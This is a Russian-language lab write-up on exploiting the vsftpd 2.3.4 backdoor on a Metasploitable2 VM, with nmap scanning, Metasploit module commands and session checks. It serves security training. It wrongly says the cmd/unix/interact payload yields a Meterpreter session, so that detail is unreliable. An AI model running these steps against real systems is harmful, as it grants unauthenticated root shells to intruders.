
Эксплуатация бэкдора vsftpd 2.3.4 (CVE-2011-2523) на Metasploitable2 — практический разбор лабораторной работы по пентесту, охватывающий разведку, эксплуатацию и устранение уязвимостей.
Практическая лабораторная работа, демонстрирующая обнаружение и эксплуатацию известной уязвимости-бэкдора в vsftpd 2.3.4, с использованием изолированной среды Kali Linux ↔ Metasploitable2.
Отработка базового цикла тестирования на проникновение — разведка, выявление уязвимостей, эксплуатация и пост-эксплуатационная проверка — на намеренно уязвимой целевой машине.
| Компонент | Описание |
|---|---|
| Атакующая машина | Kali Linux 2026.1 (VMware) |
| Целевая машина | Metasploitable2 (VMware) |
| Сеть | NAT, изолирована от хоста/интернета |
| IP-адрес цели | 192.168.233.129 |
Обе ВМ находились в одном частном сетевом сегменте, изолированном от реальной сети, чтобы гарантировать отсутствие внешнего воздействия в ходе упражнения.
nmap -sV -sC 192.168.233.129
Выполнено сканирование цели на предмет открытых портов и версий служб. Результаты включали:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
...

На порту 21 работал vsftpd 2.3.4. Общеизвестно, что эта конкретная версия содержит бэкдор: в 2011 году официальный архив исходных кодов vsftpd был скомпрометирован, и в него был внедрён вредоносный код. Вход с именем пользователя, содержащим строку :), запускает скрытый слушатель на TCP-порту 6200, предоставляющий неаутентифицированную удалённую оболочку (shell).
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.233.129
set payload cmd/unix/interact
run
Эксплойт успешно активировал бэкдор и вернул сессию Meterpreter.

sessions -i 1
sysinfo
getuid
Подтверждена активная сессия и уровень доступа на скомпрометированном хосте.


Получен полный удалённый доступ к оболочке с правами root на целевой машине без необходимости аутентификации — путём эксплуатации единственной устаревшей службы с бэкдором.
Одной-единственной устаревшей службы с известной публичной уязвимостью оказалось достаточно для полной компрометации системы — без разработки собственного эксплойта или применения продвинутых техник. Это подчёркивает, почему управление исправлениями и гигиена версий являются основой реальной безопасности.
Данное упражнение выполнялось исключительно против Metasploitable2 — намеренно уязвимой виртуальной машины, предназначенной для обучения безопасности, — в изолированной лабораторной сети, не имеющей связи с производственными системами или сторонней инфраструктурой.